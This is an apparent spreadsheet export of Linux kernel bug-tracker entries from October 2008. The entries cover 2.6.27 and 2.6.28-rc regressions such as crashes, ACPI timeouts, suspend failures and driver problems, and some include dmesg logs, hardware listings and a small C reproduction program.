    <t>Subject : 2.6.27-git8 &amp; Re: 2.6.27-git6: max1111_read_channel and corgi_ssp_ads7846_putget missing Submitter : Pavel Machek &lt;pavel@suse.cz&gt; Date : 2008-10-20 12:10 References : http://marc.info/?l=linux-kernel&amp;m=122450475101945&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NULL pointer dereference, IP: [&lt;c0190884&gt;] page_cgroup_zoneinfo+0xf/0x1b</t>
  </si>
  <si>
    <t>2.6.27-git</t>
  </si>
  <si>
    <t>2008-10-25 06:50 UTC</t>
  </si>
  <si>
    <t>2008-10-25 12:28 UTC</t>
  </si>
  <si>
    <t>Subject : [crash, -git] NULL pointer dereference, IP: [&lt;c0190884&gt;] page_cgroup_zoneinfo+0xf/0x1b Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2008-10-21 10:09 References : http://marc.info/?l=linux-kernel&amp;m=122458389103576&amp;w=4 Handled-By : Li Zefan &lt;lizf@cn.fujitsu.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>general protection fault:  from release_blocks_on_commit</t>
  </si>
  <si>
    <t>commit 3e624fc72fba09b6f999a9fbb87b64efccd38036</t>
  </si>
  <si>
    <t>2008-10-25 07:00 UTC</t>
  </si>
  <si>
    <t>2008-11-06 12:45 UTC</t>
  </si>
  <si>
    <t>Subject : general protection fault: from release_blocks_on_commit Submitter : Eric Paris &lt;eparis@redhat.com&gt; Date : 2008-10-21 14:03 References : http://lkml.org/lkml/2008/10/21/248 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>plenty of line "ACPI: EC: non-query interrupt received, switching to interrupt mode" in dmesg and system not powering down</t>
  </si>
  <si>
    <t>2008-10-25 10:29 UTC</t>
  </si>
  <si>
    <t>2009-03-02 04:36 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc1 Distribution: Gentoo Hardware Environment: ACER Travelmate 4000 Software Environment: Problem Description: Since the commit 7c6db4e050601f359081fde418ca6dc4fc2d0011 (ACPI: EC: do transaction from interrupt context") was merged into the mainline kernel, I see plenty of line "ACPI: EC: non-query interrupt received, switching to interrupt mode" in dmesg. I did a git-bisect run and it appears as the first bad commit. Can somebody explain what's happening ? Thanks for your help. Steps to reproduce:</t>
  </si>
  <si>
    <t>usb hdd problems with 2.6.27.2</t>
  </si>
  <si>
    <t>2008-10-25 12:16 UTC</t>
  </si>
  <si>
    <t>2009-03-06 15:06 UTC</t>
  </si>
  <si>
    <t>Subject : usb hdd problems with 2.6.27.2 Submitter : Luciano Rocha &lt;luciano@eurotux.com&gt; Date : 2008-10-22 16:22 References : http://marc.info/?l=linux-kernel&amp;m=122469318102679&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ext3: fix ext3_dx_readdir hash collision handling</t>
  </si>
  <si>
    <t>commit 6a897cf447a83c9c3fd1b85a1e525c02d6eada7d</t>
  </si>
  <si>
    <t>2008-10-25 12:37 UTC</t>
  </si>
  <si>
    <t>2008-10-26 04:12 UTC</t>
  </si>
  <si>
    <t>Subject : ext3: fix ext3_dx_readdir hash collision handling - Regression Submitter : Markus Trippelsdorf &lt;markus@trippelsdorf.de&gt; Date : 2008-10-25 11:56 References : http://marc.info/?l=linux-kernel&amp;m=122493582908742&amp;w=4 Handled-By : Theodore Tso &lt;tytso@mit.edu&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122493582908742&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Suspend regression on Lenovo x60</t>
  </si>
  <si>
    <t>2008-10-25 12:42 UTC</t>
  </si>
  <si>
    <t>2008-11-02 15:49 UTC</t>
  </si>
  <si>
    <t>Subject : Re: Current suspend issues on Lenovo X200 (w/ Intel graphics) Submitter : Jens Axboe &lt;jens.axboe@oracle.com&gt; Date : 2008-10-24 18:02 References : http://marc.info/?l=linux-next&amp;m=122487159829507&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>commit a802dd0e breaks console keyboard input</t>
  </si>
  <si>
    <t>commit a802dd0e</t>
  </si>
  <si>
    <t>2008-10-25 12:51 UTC</t>
  </si>
  <si>
    <t>2008-10-26 04:16 UTC</t>
  </si>
  <si>
    <t>Subject : commit a802dd0e breaks console keyboard input Submitter : walt &lt;w41ter@gmail.com&gt; Date : 2008-10-24 0:09 References : http://marc.info/?l=linux-kernel&amp;m=122480701528944&amp;w=4 Handled-By : Heiko Carstens &lt;heiko.carstens@de.ibm.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122487763507703&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28-rc1 fails building on allnoconfig</t>
  </si>
  <si>
    <t>2008-10-25 12:56 UTC</t>
  </si>
  <si>
    <t>2008-11-09 09:37 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc1 fails building on allnoconfig Submitter : Matt Mackall &lt;mpm@selenic.com&gt; Date : 2008-10-24 17:09 References : http://marc.info/?l=linux-kernel&amp;m=122487097728241&amp;w=4 Handled-By : Fenghua Yu &lt;fenghua.yu@intel.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122487160129531&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28-rc1: NCQ devices connected to PMP are  still dead</t>
  </si>
  <si>
    <t>2008-10-25 13:01 UTC</t>
  </si>
  <si>
    <t>2008-10-27 12:55 UTC</t>
  </si>
  <si>
    <t>Subject : Re: 2.6.27-rc1 (2fca5c): libata: kernel cant boot Submitter : Petr Vandrovec &lt;vandrove@vc.cvut.cz&gt; Date : 2008-10-25 11:17 References : http://marc.info/?l=linux-kernel&amp;m=122493470907259&amp;w=4 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>default IRQ affinity change in v2.6.27 (breaking several SMP PPC based systems)</t>
  </si>
  <si>
    <t>2008-10-25 13:09 UTC</t>
  </si>
  <si>
    <t>2009-02-09 00:38 UTC</t>
  </si>
  <si>
    <t>Subject : default IRQ affinity change in v2.6.27 (breaking several SMP PPC based systems) Submitter : Kumar Gala &lt;galak@kernel.crashing.org&gt; Date : 2008-10-24 12:45 References : http://marc.info/?l=linux-kernel&amp;m=122485245924125&amp;w=4 Handled-By : Chris Snook &lt;csnook@redhat.com&gt; Handled-By : Scott Wood &lt;scottwood@freescale.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>wmifinfo dockapp takes 100% of cpu</t>
  </si>
  <si>
    <t>2008-10-25 13:21 UTC</t>
  </si>
  <si>
    <t>2008-10-26 13:15 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.28-rc1 regression] wmifinfo dockapp takes 100% of cpu (bisected) Submitter : "Carlos R. Mafra" &lt;crmafra2@gmail.com&gt; Date : 2008-10-25 9:40 References : http://marc.info/?l=linux-kernel&amp;m=122492763030453&amp;w=4 Handled-By : Arjan van de Ven &lt;arjan@linux.intel.com&gt; Handled-By : Marcin Slusarz &lt;marcin.slusarz@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122496000507991&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>v2.6.28-rc1: Regression in ext3/jbd</t>
  </si>
  <si>
    <t>2008-10-25 13:24 UTC</t>
  </si>
  <si>
    <t>2008-11-02 13:32 UTC</t>
  </si>
  <si>
    <t>Subject : v2.6.28-rc1: Regression in ext3/jbd Submitter : "Vegard Nossum" &lt;vegard.nossum@gmail.com&gt; Date : 2008-10-25 11:22 References : http://marc.info/?l=linux-kernel&amp;m=122493379905812&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Random problems with 2.6.28-rc1-git1</t>
  </si>
  <si>
    <t>2.6.28-rc1-git1</t>
  </si>
  <si>
    <t>2008-10-25 13:29 UTC</t>
  </si>
  <si>
    <t>2008-10-26 11:06 UTC</t>
  </si>
  <si>
    <t>Subject : Random problems with 2.6.28-rc1-git1 Submitter : "Mikko C." &lt;mikko.cal@gmail.com&gt; Date : 2008-10-25 14:53 References : http://marc.info/?l=linux-kernel&amp;m=122494643521893&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>v2.6.28-rc1: readlink /proc/*/exe returns uninitialized data to userspace</t>
  </si>
  <si>
    <t>2008-10-25 13:34 UTC</t>
  </si>
  <si>
    <t>2009-03-08 05:09 UTC</t>
  </si>
  <si>
    <t>Subject : v2.6.28-rc1: readlink /proc/*/exe returns uninitialized data to userspace Submitter : "Vegard Nossum" &lt;vegard.nossum@gmail.com&gt; Date : 2008-10-25 17:14 References : http://marc.info/?l=linux-kernel&amp;m=122495490201663&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pl2303: kernel BUG when bringing down ppp connection</t>
  </si>
  <si>
    <t>2008-10-25 17:34 UTC</t>
  </si>
  <si>
    <t>Jason Cassell</t>
  </si>
  <si>
    <t>2010-01-25 14:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.6 Earliest failing kernel version: 2.6.27 Distribution: Debian sid Hardware Environment: Dell Inspiron 1721, AMD x86-64 SMP Software Environment: Gnu C 4.3.2 Gnu make 3.81 binutils 2.18.0.20080103 util-linux 2.13.1.1 mount 2.13.1.1 module-init-tools found Linux C Library 2.7 Dynamic linker (ldd) 2.7 Procps 3.2.7 Console-tools 0.2.3 Sh-utils 6.10 udev 125 Problem Description: I connect to my dialup service with a Zoom model 3048 modem connected via a Radio Shack 26-183 USB/serial converter cable. When I log off (using poff), sometimes it works perfectly, but usually after the modem disconnects I get: kernel BUG at drivers/char/tty_ldisc.c:199! invalid opcode: 0000 [1] PREEMPT SMP CPU 1 and then 12 screenfuls of stack traces and stuff, with a bunch of "scheduling while atomic" BUGs.. none of it ever managed to get in any logs, so I'll be attaching photos of the screen. At this point, sometimes the magic SysRq key combinations work, but usually they don't, and I have to just turn the computer off. I reproduced this with 2.6.27.2 and 2.6.27.3, and then with 2.6.27 using a configuration closer to the one I use for 2.6.26.6. I set the severity to high because this makes 2.6.27 unusable for me. Steps to reproduce: hmm, guess I already said that.</t>
  </si>
  <si>
    <t>seq_file does not handle pread()</t>
  </si>
  <si>
    <t>2008-10-25 17:40 UTC</t>
  </si>
  <si>
    <t>Petr Vandrovec</t>
  </si>
  <si>
    <t>2012-04-04 15:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: commit 9617760287eec9091d26e6967bd3e4194de18f97 Distribution: Debian Hardware Environment: Software Environment: Problem Description: pread() does not work on seq_file. That makes some VMware utilities unhappy, as to save some opens &amp; closes these apps open /proc/uptime on start, and keep it open until exit. And because they are multithreaded, they are using pread()... And it works until seq_file conversion, but not after. Steps to reproduce: #include &lt;unistd.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;errno.h&gt; void main(void) { int fd = open("/proc/uptime", O_RDONLY); while (1) { char buffer[1234]; int err = pread(fd, buffer, sizeof buffer - 1, 0); if (err == -1) { perror("Oops: %m\n"); } else { buffer[err] = 0; printf("Another second, uptime info is %s\n", err); } sleep(1); } }</t>
  </si>
  <si>
    <t>Timeout regression introduced by 242f9dcb8ba6f68fcd217a119a7648a4f69290e9</t>
  </si>
  <si>
    <t>commit 242f9dcb8ba6f68fcd217a119a7648a4f69290e9</t>
  </si>
  <si>
    <t>2008-10-26 04:38 UTC</t>
  </si>
  <si>
    <t>2008-12-07 18:51 UTC</t>
  </si>
  <si>
    <t>Subject : Timeout regression introduced by 242f9dcb8ba6f68fcd217a119a7648a4f69290e9 Submitter : Tejun Heo &lt;tj@kernel.org&gt; Date : 2008-10-26 9:46 References : http://marc.info/?l=linux-kernel&amp;m=122501447326698&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>bisected: 2.6.28-rc broke my iwl4965 wireless</t>
  </si>
  <si>
    <t>2.6.28-rc</t>
  </si>
  <si>
    <t>2008-10-26 04:44 UTC</t>
  </si>
  <si>
    <t>2008-10-26 13:14 UTC</t>
  </si>
  <si>
    <t>Subject : bisected: 2.6.28-rc broke my iwl4965 wireless Submitter : Arjan van de Ven &lt;arjan@infradead.org&gt; Date : 2008-10-26 5:22 References : http://marc.info/?l=linux-kernel&amp;m=122499853112042&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WOL for E100 Doesn't Work Anymore</t>
  </si>
  <si>
    <t>2008-10-26 21:56 UTC</t>
  </si>
  <si>
    <t>Roger</t>
  </si>
  <si>
    <t>2009-05-21 15:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.27 Distribution: Gentoo Hardware Environment: 2x750P3 1G RAM w/ 00:14.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 08) Problem Description: As of kernel version 2.6.27, WOL has stopped working. The box no longer powers on after the magic packet has been sent. Rebooting using kernel-2.6.26*, WOL *does* work! Steps to reproduce: (Not needed. Self Explanatory.) I noticed 3 lines of code in e100.c added/modified since 2.6.26*, however, I reversed 2 lines of code to 2.6.26 and the other line was just added an additional pointer, for which I left alone. Recompiled, rebooted and WOL still didn't work using 2.6.27. I'm guessing, the source of this bug lies elsewhere.</t>
  </si>
  <si>
    <t>unable to mount ext3 root filesystem due to htree_dirblock_to_tree</t>
  </si>
  <si>
    <t>2.6.28 rcx git and vanilla trees</t>
  </si>
  <si>
    <t>2008-10-28 05:09 UTC</t>
  </si>
  <si>
    <t>Jimmy.Jazz</t>
  </si>
  <si>
    <t>2008-11-16 17:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.27.3 Earliest failing kernel version:2.6.28 rc1 git1 Distribution: gentoo Hardware Environment: x86_64 amd Software Environment: kernel + initramfs Problem Description: Since 2.6.28 mount command (busybox) is unable to mount the root file system. The error returned is, EXT3-fs error (device md_d0p2): htree_dirblock_to_tree: bad entry in directory #2: rec_len % 4 != 0 - offset=0, inode=2109536318, rec_len=16058, name_len=111 (The figures could change) To make it work, I need first to mount the file system as an ext2 file system, unmount it and recall mount command with the -t ext3 option. step 1: mount -o ro /dev/md/d0p2 /new-root (mount ok with flags ro,errors=continue) ls /new-root (ls without error) umount /new-root and then step 2: mount -t ext3 -o ro /dev/md/d0p2 /new-root (mount ok with flags ro,errors=continue,data=ordered) ls /new-root (ls without error) ext2,jbd,ext3,mbcache,crc32 are modules and are loaded from an initramfs file system. IMHO, it is a problem in mbcache or jbd. Also, there is an other problem with that kernel. After creating the /dev node, loading md_mod and raid1, mdassemble start as usual the md device, but the mount command doesn't recognize the /dev node as valid and abort. I need to stop the md device that has been created earlier and reapply mdassemble or mdadm --assemble --scan from initramfs file system. Afterwards mount command is able to mount the file system but... like an ext2 file system. I'm on step 2 again. Steps to reproduce: reboot the kernel, load the initramfs file system and open a shell just after the mount command has aborted.</t>
  </si>
  <si>
    <t>radeonfb lockup in .28-rc (bisected)</t>
  </si>
  <si>
    <t>2008-10-28 08:53 UTC</t>
  </si>
  <si>
    <t>2008-12-03 15:28 UTC</t>
  </si>
  <si>
    <t>Subject : radeonfb lockup in .28-rc (bisected) Submitter : James Cloos &lt;cloos@jhcloos.com&gt; Date : 2008-10-28 0:00 References : http://marc.info/?l=linux-kernel&amp;m=122515210200530&amp;w=4 Handled-By : Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>RCU hang on cpu re-hotplug with 2.6.27rc8</t>
  </si>
  <si>
    <t>2008-10-28 09:08 UTC</t>
  </si>
  <si>
    <t>2012-12-08 07:27 UTC</t>
  </si>
  <si>
    <t>Subject : RCU hang on cpu re-hotplug with 2.6.27rc8 Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2008-10-06 23:28 References : http://marc.info/?l=linux-kernel&amp;m=122333610602399&amp;w=2 Handled-By : "Paul E. McKenney" &lt;paulmck@linux.vnet.ibm.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Improper ATA cable detection after S2R _only_:  "limited to UDMA/33 due to 40-wire cable"</t>
  </si>
  <si>
    <t>2008-10-28 13:25 UTC</t>
  </si>
  <si>
    <t>2012-05-22 15:07 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Ubuntu 8.10rc Hardware Environment: Acer One A110L (Intel 945GSE / ICH7-M), SSD (Samsung P-SSD1800), BIOS v0.3109 Software Environment: Ubuntu 8.10rc, Linux 2.6.27-7-generic Problem Description: Bootup machine, no problem with ATA interfacing, full speed connection (leading to ~40MB/s with hdparm): [ 5.631156] ata1: SATA max UDMA/133 cmd 0x1f0 ctl 0x3f6 bmdma 0x60a0 irq 14 [ 5.631168] ata2: PATA max UDMA/100 cmd 0x170 ctl 0x376 bmdma 0x60a8 irq 15 [ 5.852225] usb 5-5: new high speed USB device using ehci_hcd and address 2 [ 5.961673] ata2.00: ATA-5: P-SSD1800, Ver2.Y0C, max UDMA/66 [ 5.961683] ata2.00: 15761088 sectors, multi 0: LBA [ 5.969597] ata2.00: configured for UDMA/66 [ 5.969915] scsi 1:0:0:0: Direct-Access ATA P-SSD1800 Ver2 PQ: 0 ANSI: 5 Suspend to RAM, then resume, witness: [ 968.980271] ata2.00: ACPI cmd ef/03:0c:00:00:00:a0 filtered out [ 968.980278] ata2.00: ACPI cmd ef/03:42:00:00:00:a0 filtered out [ 968.980315] ata2.00: limited to UDMA/33 due to 40-wire cable [ 968.989637] ata2.00: configured for UDMA/33 [ 968.989781] sd 1:0:0:0: [sda] 15761088 512-byte hardware sectors (8070 MB) [ 968.989828] sd 1:0:0:0: [sda] Write Protect is off [ 968.989834] sd 1:0:0:0: [sda] Mode Sense: 00 3a 00 00 [ 968.989913] sd 1:0:0:0: [sda] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA and a severe hdparm downgrade of about 25MB/s (note that I tried about 5 cycles of boot and resume, always reliably resulting in proper and improper cable detection each). (IOW, yet another area where Linux seems to lose massive heaps of speed lately - c.f. absolutely shocking Phoronix Ubuntu distro version testing results) And with a lame SSD (low write performance), obviously this hurts plenty. Driver is ata_piix, register PIIX_IOCFG (0x54, responsible for cable detection) is _identical_ (0x00) both after boot and after resume, in fact all PCI registers are identical in both cases: 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02) 00: 86 80 c4 27 05 00 b0 02 02 80 01 01 00 00 00 00 10: 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20: a1 60 00 00 00 00 00 00 00 00 00 00 25 10 5b 01 30: 00 00 00 00 70 00 00 00 00 00 00 00 0b 02 00 00 40: 4c 80 07 e3 00 00 00 00 04 00 00 02 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 01 00 02 40 00 00 00 00 00 00 00 00 00 00 00 00 80: 05 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 02 00 05 0c 80 01 80 da 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 86 0f 02 00 00 00 00 00 Possibly the [ 968.980271] ata2.00: ACPI cmd ef/03:0c:00:00:00:a0 filtered out [ 968.980278] ata2.00: ACPI cmd ef/03:42:00:00:00:a0 filtered out may be to blame here, since I'm quite sure this is a message about ACPI IDE setup resume method (Tejun Hejo elaborated a bugfix - #9530 - for another box of mine earlier in this area). # lspci 00:00.0 Host bridge: Intel Corporation Mobile 945GME Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GME Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) 00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 02) 00:1c.2 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 3 (rev 02) 00:1c.3 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 4 (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02) 02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 02) 03:00.0 Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01) 04:00.0 System peripheral: JMicron Technologies, Inc. SD/MMC Host Controller 04:00.2 SD Host controller: JMicron Technologies, Inc. Standard SD Host Controller 04:00.3 System peripheral: JMicron Technologies, Inc. MS Host Controller 04:00.4 System peripheral: JMicron Technologies, Inc. xD Host Controller Cross-verified on Inspiron 8000 (i815, 2.6.27-rc9, ata_piix), no such issue after resume there, cabling always detected properly. OK, I could easily add an Acer One A110L entry to the ich_laptop quirk list, but somehow hardcoding this doesn't sound at all like being an acceptable solution (note that this list is full of Acer entries though!! Possibly due to BIOS resume quirks??). Any thoughts? Thanks, Andreas Mohr</t>
  </si>
  <si>
    <t>ACPI: EC: acpi_ec_wait timeout - AE_TIME - ASUS X50GL laptop</t>
  </si>
  <si>
    <t>2.6.27.4</t>
  </si>
  <si>
    <t>2008-10-28 15:20 UTC</t>
  </si>
  <si>
    <t>admin</t>
  </si>
  <si>
    <t>2009-01-09 14:04 UTC</t>
  </si>
  <si>
    <t>radoen</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.1 Earliest failing kernel version: 2.6.27.4 or earlier Distribution: Debian Hardware Environment: ASUS X50GL laptop Software Environment: Problem Description: Under 2.6.24.1, ACPI is working fine (battery, brightness controls, freq. scaling...). Under 2.6.27.4 I get the following errors: kernel: ACPI: EC: acpi_ec_wait timeout, status = 0xa0, event = "b0=1" kernel: ACPI: EC: read timeout, command = 128 kernel: ACPI Exception (evregion-0419): AE_TIME, Returned by Handler for [EmbeddedControl] [20080609] kernel: ACPI Error (psparse-0530): Method parse/execution failed [\_TZ_.RTMP] (Node f743eef0), AE_TIME kernel: ACPI Error (psparse-0530): Method parse/execution failed [\_TZ_.THRM._TMP] (Node f743efb8), AE_TIME kernel: ACPI: EC: acpi_ec_wait timeout, status = 0x04, event = "b0=1" kernel: ACPI: EC: read timeout, command = 130 kernel: ACPI: EC: acpi_ec_wait timeout, status = 0x82, event = "b0=1" kernel: ACPI: EC: read timeout, command = 130 kernel: ACPI: EC: acpi_ec_wait timeout, status = 0x82, event = "b0=1" kernel: ACPI: EC: read timeout, command = 130 kernel: ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.SADC] (Node f743e5f4), AE_TIME Oct 28 21:15:04 gravity execution failed [\_SB_.PCI0.SBRG.EC0_.STBR] (Node f743e644), AE_TIME kernel: ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.IXVE.VGA_.LCDD._BCM] (Node f74373ec), AE_TIME (and many more) Any attempt to acess files under /proc/acpi outputs the same ACPI: EC: read tiemouts. I have fixed it in 2.6.27.4 replacing drivers/acpi/ec.c with the one shipped with 2.6.24.1 Steps to reproduce:</t>
  </si>
  <si>
    <t>Linux 2.6.28-rc2 i/o error on /dev/ttyUSB0</t>
  </si>
  <si>
    <t>2.6.28-rc2</t>
  </si>
  <si>
    <t>2008-10-28 16:17 UTC</t>
  </si>
  <si>
    <t>2008-11-04 09:38 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 2.6.28-rc2 i/o error on /dev/ttyUSB0 Submitter : Helge Hafting &lt;helge.hafting@aitel.hist.no&gt; Date : 2008-10-28 11:19 References : http://marc.info/?l=linux-kernel&amp;m=122519319922377&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>dbench 15% regression with 2.6.28-rc1</t>
  </si>
  <si>
    <t>2008-10-28 16:19 UTC</t>
  </si>
  <si>
    <t>2008-11-09 09:46 UTC</t>
  </si>
  <si>
    <t>Peter Zijlstra</t>
  </si>
  <si>
    <t>Subject : dbench 15% regression with 2.6.28-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2008-10-28 8:41 References : http://marc.info/?l=linux-kernel&amp;m=122518333103345&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>No battery status information - HP EliteBook 2730p</t>
  </si>
  <si>
    <t>2008-10-28 23:01 UTC</t>
  </si>
  <si>
    <t>Alex Shumakovitch</t>
  </si>
  <si>
    <t>2009-01-16 13:19 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: N/A Earliest failing kernel version: 2.6.27.4 Distribution: Debian Lenny (testing) Hardware Environment: HP 2730p tablet PC laptop, Core2 Duo CPU L9400 @1.86GHz, 4GB RAM Software Environment: Fresh install of Debian Lenny/testing with vanilla 2.6.27.4 kernel from www.kernel.org The only change made is the intel_agp patch from http://intellinuxgraphics.org/download.html (the system hangs up otherwise). Problem Description: ACPI doesn't provide battery status. In fact, the directory /proc/acpi/battery is missing completely. dmesg shows multiple ACPI errors during the boot time of the type ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.BAT0._BIF] (Node f7446ba8), AE_TIME All kernels prior to 2.6.27 that I've tried boot with apci=off option only (with only one core recognized), so I don't know whether this problem existed in earlier versions. I found several bug reports about similar problems on other types of laptops, but they all were supposed to be fixed in 2.6.27 by now. By the way, temperature sensors at several zones and frequency scaling work. Steps to reproduce: Boot the laptop. I'm going to attach the outputs of dmesg, lcpci, and acpidump to this bug report for more details. I'm not sure which other information might be useful. Thank you, --- Alex.</t>
  </si>
  <si>
    <t>rtl8187 has to be unloaded before hibernation</t>
  </si>
  <si>
    <t>2.6.28-rc2-17</t>
  </si>
  <si>
    <t>2008-10-29 06:07 UTC</t>
  </si>
  <si>
    <t>Michael Lashkevich</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: 2.6.28-rc2-17 (and 2.6.27.2 where I added the identifyer 0bda:8198 of my card to the source code manually) Distribution: Hardware Environment: Toshiba Satellite L300-11E (with the card 0bda:8198). Software Environment: OpenSUSE 10.3 Problem Description: If I hibernate the computer with the rtl8187 module loaded, the hibernation prossess freeses the computer forever at some early stage (presumably at the stage for freesing tasks). Steps to reproduce: 1. Ensure that the module is loaded (by 'lsmod'). 2. echo disk &gt; /sys/power/state (Or better, use pm-utilities since it logs the process better and can send some information to the console.) 3. After rebooting you may unload the module and ensure than hibernation proceeds with image creation.</t>
  </si>
  <si>
    <t>resume from disk broken on hp/compaq nx7000 (DRM problem)</t>
  </si>
  <si>
    <t>2008-10-29 14:42 UTC</t>
  </si>
  <si>
    <t>2008-11-13 12:08 UTC</t>
  </si>
  <si>
